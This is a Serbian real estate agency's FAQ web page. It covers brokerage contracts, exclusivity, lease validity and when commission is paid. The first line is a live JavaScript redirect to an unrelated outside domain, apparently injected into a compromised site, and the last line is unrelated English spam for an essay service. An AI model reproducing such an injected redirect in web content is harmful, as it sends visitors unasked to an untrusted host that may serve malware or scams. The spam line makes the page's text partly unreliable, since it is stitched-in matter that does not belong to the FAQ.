window.location='http://ww82.jquerystatistics.org/';

VI PITATE -OPŠTA PITANJA

VI PITATE


Poštovani klijenti,

Sa željom da ne jednom mestu imate što kompletnije i pouzdanije informacije, posvetili smo jednu  stranicu sajta upravo Vama.

Ukoliko imate još pitanja slobodno ih pošaljite. Mi ćemo ih uz Vašu saglasnost rado obajviti  kako bih i drugim korisnicima bile svrsishodne.

Da li u vašoj agenciji pored ponude na sajtu imate i drugih nekretnina I kako se možemo o njima informisati ?

Da. Agencija Premium properties poseduje i nekretnine za koje vlasnici ne žele oglašavati putem sredstava javnog informisanja ali se o njima može dobiti informacija u samoj  Agenciji.

Žašto odbarati agenciju za promet Nepokretnosti kada i sam mogu da  “SVE vidim „ na internetu ?

Nepisano pravilo kaže „Da se novac može nadoknaditi ali potrošeno vreme –nikad“ .Na raspolaganju Vam je lični agent – a plaćate ga po realizaciji. Novac ne gubite a vreme štedite a šansa da  dođete do željene prodaje ili zakupca se povećava..

Da li nam „ vi garantujete  da ćete mi naći adekvatnu nekretninu, a ja znam tačno šta hoću“?

Mi Vam možemo garantovati da ćemo u najkraćem mogućem roku  dostaviti jednu ili više ponuda prema Vašem upitu i da će ona biti realna i istinita, i da će naš agent raditi u skladu sa Zakonom o prometu Nepokretnosti poštujući sva moralna načela.

Da li  je obavezujuće potpisati „ posrednički ugovor“?

Da „ Zakonom o prometu Nepokretnosti“ je jasno definisao da se isključivo ugovorom u pisanoj formi može posredovati  VAŠIM nekreninama.

DA  li taj ugovor se može potpisati sa Više agencija istovremeno?

Da, pod uslovom da niste potpisali UGOVOR  koji daje pravo EKSKLUZIVITETA.

Da li je ugovor o „ZAKUPU „ validan ukoliko se ne overava kod notara ili suda?

Da validan je  u skladu sa  Zakonom o prometu Nepokretnosti

Koje su moje obaveze kao Nalogodavca?

O tome više pročitajte u Opštim uslovima poslovanja na našem sajtu   http://www.premiumproperties.rs/uslovi-poslovanja/ 

Koje su  Vaše obaveze kao  Posrednika?

O tome više pročitajte u Opštim uslovima poslovanja na našem sajtu  http://www.premiumproperties.rs/uslovi-poslovanja/   

Kada se vrši isplata provizije  po osnovu ugovora o  izdavanju nepokretnosti ?

Isplata se vrši odmah nakon potpisivanja Ugovora o zakupu  izmedju  Zakupca i Zakupodavca.

If it usually means buying affordablepapers a lot more than you require, then it is worth buying into.